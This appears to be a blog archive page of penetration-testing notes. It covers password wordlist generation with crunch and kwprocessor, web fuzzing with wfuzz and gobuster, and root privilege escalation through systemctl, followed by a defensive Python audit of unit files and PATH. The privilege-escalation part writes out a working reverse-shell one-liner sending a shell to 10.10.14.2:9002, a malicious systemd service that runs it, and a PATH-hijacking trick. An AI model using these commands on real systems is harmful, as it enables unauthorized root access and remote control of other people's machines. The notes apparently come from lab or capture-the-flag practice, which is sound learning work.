Posts

Showing posts from November, 2019

Password Cracking

Good Post: Bruteforcing using Custom Scripts

Crunch:

    crunch 8 8 -t Any_Characters -o list.txt

If you want to create something like Bha!!123:

    crunch 8 8 -t ,@@^^%%%

    , = upper case letters
    @ = lower case letters
    ^ = special characters
    % = numbers

Generating Wordlist using kwprocessor

This is used for generating random passwords that users might type as a streak on the keyboard, for example: qwertyuiop[]\

    git clone https://github.com/hashcat/kwprocessor.git
    # Create a keyword list based on routes users use to create passwords
    ./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt

Fuzzing for Webpages

    # show all responses except 404 and 403
    wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100

    # Fuzzing webpages; -b --> negative responses; -k --> ignore ce
    gobuster dir --url http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

Priv Esc using Systemctl

This can be done when you find systemctl is running as root, so we need to create our own service. That can be done as follows.

METHOD - I

Create a file named test.sh on the target machine:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9002 >/tmp/f

Save it as test.sh, copy the file to /home/bhanu/test.sh, and make it executable:

    chmod +x test.sh

Now create a new service and save it as mys.service:

    [Unit]
    Description=Example systemd service.

    [Service]
    Type=simple
    ExecStart=/bin/bash /home/bhanu/test.sh

    [Install]
    WantedBy=multi-user.target

Enable it:

    systemctl enable /home/bhanu/mys.service

Open a new terminal in Kali:

    nc -nvlp 9002

On the victim machine:

    systemctl start mys.service

METHOD - II

This can be achieved by adding a new path when systemctl is running as root.

    echo $PATH
    systemctl            # runs the original systemctl
    cd /tmp
    nano systemctl       # add "bash" in the systemctl file
    PATH=/tmp:$PATH
    export PATH
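From the defender's side, both methods leave something you can audit: a unit file whose Exec line points into a user-writable location, and a PATH with a world-writable directory in it. The check below is an added example, not code from the original post; the prefix list and function names are assumptions made for illustration, and the sample unit is the one shown in this post.

```python
import os
import shlex
import stat

# Locations unprivileged users can usually write to (assumed list for this example).
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def exec_paths(unit_text):
    """Return absolute paths named on Exec* lines (ExecStart, ExecStartPre, ...)."""
    found = []
    for line in unit_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if not sep or not key.startswith("Exec"):
            continue
        for token in shlex.split(value):
            token = token.lstrip("-@+!:")  # systemd executable prefixes
            if token.startswith("/"):
                found.append(token)
    return found

def risky_exec_paths(unit_text):
    """Exec* targets or arguments that live where a non-root user can write."""
    return [p for p in exec_paths(unit_text) if p.startswith(USER_WRITABLE_PREFIXES)]

def risky_path_entries(path_value):
    """PATH entries that are empty, relative, or world-writable directories."""
    risky = []
    for entry in path_value.split(":"):
        if not entry.startswith("/"):
            risky.append(entry)  # empty or relative entries resolve against the cwd
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue  # a missing directory cannot shadow a binary today
        if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
            risky.append(entry)
    return risky

# Constructed sample: the unit file shown in this post.
SAMPLE_UNIT = """[Unit]
Description=Example systemd service.
[Service]
Type=simple
ExecStart=/bin/bash /home/bhanu/test.sh
[Install]
WantedBy=multi-user.target
"""
```

Run risky_exec_paths over each file under /etc/systemd/system and risky_path_entries over the PATH that root's shells and services actually inherit; any hit is worth reviewing alongside who is allowed to invoke systemctl as root.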